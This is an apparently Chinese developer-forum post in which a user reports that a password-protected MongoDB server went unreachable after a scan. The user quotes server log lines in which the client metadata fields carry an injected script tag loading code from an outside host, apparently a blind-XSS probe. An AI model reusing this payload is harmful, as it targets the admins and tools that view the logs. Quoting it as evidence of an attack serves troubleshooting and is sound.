
2020-12-10 20:12:18 +08:00

mongo 数据库 有管理员密码和单一数据库密码,被扫了之后,数据库就掉了,链接不上。

看他还有 xss 的操作

{ driver: { name: "PyMongo|"><script src=https://mongo.xss.ht></script>", version: "3.11.0|"><script src=https://mongo.xss.ht></script>" }, os: { type: "Linux", name: "", architecture: "x86_64", version: "4.14.203-112.332.amzn2.x86_64" }, platform: "CPython 2.7.18.final.0|"><script src=https://mongo.xss.ht></script>" } 2020-11-28T02:33:44.039+0800 I NETWORK [conn1136] received client metadata from conn1136: { driver: { name: "PyMongo|"><script src=https://mongo.xss.ht></script>", version: "3.11.0|"><script src=https://mongo.xss.ht></script>" }, os: { type: "Linux", name: "", architecture: "x86_64", version: "4.14.203-112.332.amzn2.x86_64" }, platform: "CPython 2.7.18.final.0|"><script src=https://mongo.xss.ht></script>" }

再用 shell 链接 会报这个错误

Error: network error while attempting to run command 'isMaster' on host '127

查 google 是说链接数量过多,但是 mongo 的日志没有报链接数量过多

1433 次点击
所在节点    数据库
0 条回复

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。


V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX